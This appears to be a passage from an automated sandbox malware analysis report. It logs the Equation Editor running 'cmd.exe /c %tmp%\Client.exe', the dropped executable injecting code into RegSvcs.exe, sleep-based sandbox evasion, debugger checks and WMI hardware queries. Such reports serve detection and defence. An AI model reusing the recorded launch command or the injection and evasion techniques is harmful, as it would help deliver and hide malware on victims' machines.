                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1336Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1336Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3012Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exe TID: 1552Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exe TID: 2176Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exe TID: 2364Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exe TID: 2380Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2220Thread sleep time: -180000s >= -30000sJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2612Thread sleep time: -180000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Client.exe TID: 3044Thread sleep time: -60000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Client.exe TID: 2600Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 9038Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 5153Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8512
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 30000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 30000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 30000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 30000
                  Source: Client.exe, 00000009.00000002.928434749.0000000002140000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: lQeMuGIULxzSSWBFvoGmFrytHnvtzMnrinyuvSjZQcGjDOtBUdtvkjXdoFFcKkpUJHFzXHecaBrdlOKNOPZ8A4HD
                  Source: Client.exe, 0000000C.00000002.984981021.0000000002680000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1002192486.0000000002680000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: lQeMuGIULxzSSWBFvoGmFrytHnvtzMnrinyuvSjZQcGjDOtBUdtvkjXdoFFcKkpUJHFzXHecaBrdlOKNOPZ
                  Source: Client.exe, 00000009.00000002.928434749.0000000002140000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.985003191.0000000002689000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1002238776.0000000002689000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQaeNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQrhTNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQemuNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQseRNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQ
                  Source: Client.exe, 00000009.00000002.928225350.0000000000530000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: CdNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQaeNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQrhTNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQemuNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQseRNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQ
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess queried: DebugPortJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess queried: DebugPortJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess queried: DebugPortJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess queried: DebugPortJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess queried: DebugPortJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess queried: DebugPortJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess queried: DebugPort
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 436000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 438000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 436000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 438000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 436000
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 438000
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c%tmp%\Client.exe A CJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c%tmp%\Client.exe A C
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A C
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Client.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
